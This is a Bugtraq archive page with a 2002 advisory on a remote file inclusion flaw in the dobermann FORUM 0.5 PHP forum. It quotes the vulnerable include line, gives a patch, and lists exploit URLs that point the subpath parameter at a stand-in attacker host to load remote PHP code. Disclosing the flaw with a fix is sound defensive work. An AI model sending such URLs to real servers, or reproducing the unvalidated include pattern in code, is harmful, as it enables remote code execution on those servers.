Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

dobermann FORUM (php)

From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 27 Oct 2002 23:53:19 +0100
Informations :
°°°°°°°°°°°°°°
Product : dobermann FORUM
version : 0.5
website : http://www.le-dobermann.com
Problem : Include file

PHP Code/location :
°°°°°°°°°°°°°°°°°°°
entete.php
enteteacceuil.php
topic/entete.php :
------------------------------------------
<?php @include $subpath."banniere.php"; ?>
------------------------------------------

index.php
newtopic.php :
------------------------
@require "config.php";
@include("entete.php");
------------------------

Exploits :
°°°°°°°°°°
http://[target]/entete.php?subpath=http://[attacker]/
http://[target]/enteteacceuil.php?subpath=http://[attacker]/
http://[target]/topic/entete.php?subpath=http://[attacker]/
http://[target]/index.php?subpath=http://[attacker]/
http://[target]/newtopic.php?subpath=http://[attacker]/
with
http://[attacker]/banniere.php

Patch :
°°°°°°°
In files :
------------------
entete.php
enteteacceuil.php
topic/entete.php
------------------
replace the line :
------------------------------------------
<?php @include $subpath."banniere.php"; ?>
------------------------------------------
by :
------------------------------------------
<?php
$banfile=$subpath."banniere.php";
if (file_exists($banfile)){
@include $banfile; }
?>
------------------------------------------



More details in french :
http://www.frog-man.org/tutos/dobermannFORUM.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FdobermannFORUM.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n






_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis ! http://www.msn.fr/msger/default.asp
Previous By Date Next
Previous By Thread Next

Current thread: